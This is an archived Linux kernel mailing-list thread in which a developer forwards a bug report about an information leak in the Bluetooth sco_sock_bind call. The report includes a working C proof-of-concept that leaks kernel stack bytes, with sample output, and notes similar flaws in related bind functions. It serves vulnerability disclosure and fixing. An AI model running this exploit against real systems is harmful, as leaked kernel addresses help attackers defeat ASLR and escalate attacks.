Hi Dmitry, thx for mentioning iucv_sock_bind here. I will provide the equivalent fix and add your name as "Reported-by" - if you do not object. Regards, Ursula Braun ----- Forwarded by Ursula Braun1/Germany/IBM on 15/01/2016 09:18 ----- From: Dmitry Vyukov <dvyukov@xxxxxxxxxx> To: Marcel Holtmann <marcel@xxxxxxxxxxxx>, Gustavo Padovan <gustavo@xxxxxxxxxxx>, Johan Hedberg <johan.hedberg@xxxxxxxxx>, "David S. Miller" <davem@xxxxxxxxxxxxx>, linux-bluetooth@xxxxxxxxxxxxxxx, netdev <netdev@xxxxxxxxxxxxxxx>, LKML <linux-kernel@xxxxxxxxxxxxxxx>, syzkaller <syzkaller@xxxxxxxxxxxxxxxx>, Kostya Serebryany <kcc@xxxxxxxxxx>, Alexander Potapenko <glider@xxxxxxxxxx>, Sasha Levin <sasha.levin@xxxxxxxxxx>, Eric Dumazet <edumazet@xxxxxxxxxx>, Kees Cook <keescook@xxxxxxxxxx>, Hannes Frederic Sowa <hannes@xxxxxxxxxxxxxxxxxxx>, Ursula Braun1/Germany/IBM@IBMDE, linux-s390@xxxxxxxxxxxxxxx, Lauro Ramos Venancio <lauro.venancio@xxxxxxxxxxxxx>, Aloisio Almeida Jr <aloisio.almeida@xxxxxxxxxxxxx>, Samuel Ortiz <sameo@xxxxxxxxxxxxxxx>, Date: 15/12/2015 21:02 Subject: Information leak in sco_sock_bind Hello, The following program leads to leak of 6 bytes from kernel stack: #include <sys/types.h> #include <sys/socket.h> #include <linux/in.h> #include <linux/in6.h> #include <linux/socket.h> #include <linux/if.h> #include <errno.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <fcntl.h> struct sockaddr_sco { sa_family_t sco_family; char sco_bdaddr[6]; }; #define BTPROTO_SCO 2 int main(void) { struct sockaddr sa; struct sockaddr_sco sco_sa; unsigned len, i, try; int fd; for (try = 0; try < 3; try++) { fd = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_SCO); if (fd == -1) return; switch (try) { case 0: break; case 1: sched_yield(); break; case 2: open("/dev/null", O_RDONLY); } memset(&sco_sa, 0, sizeof(sco_sa)); sco_sa.sco_family = AF_BLUETOOTH; bind(fd, &sco_sa, 2); len = sizeof(sa); getsockname(fd, &sa, &len); for (i = 0; i < len; i++) printf("%02x", ((unsigned char*)&sa)[i]); printf("\n"); } return 0; } Output: 1f00333e0088ffff 1f00c13e0088ffff 1f002081ffffffff The problem is that sco_sock_bind does not check sockaddr_len passed in, so it copies stack garbage from stack into the socket. This can defeat ASLR, leak crypto keys, etc. We've just fixed a similar issue in pptp_bind. The similar issue is in llcp_sock_bind and llcp_raw_sock_bind. And there seems to be the same bug in iucv_sock_bind, it is S390 specific, so I can't test it. Kees proposed to zero unused part of sockaddr in SyS_bind/SyS_connect, or add addr size to proto struct to prevent all such existing and future bugs. -- To unsubscribe from this list: send the line "unsubscribe linux-bluetooth" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html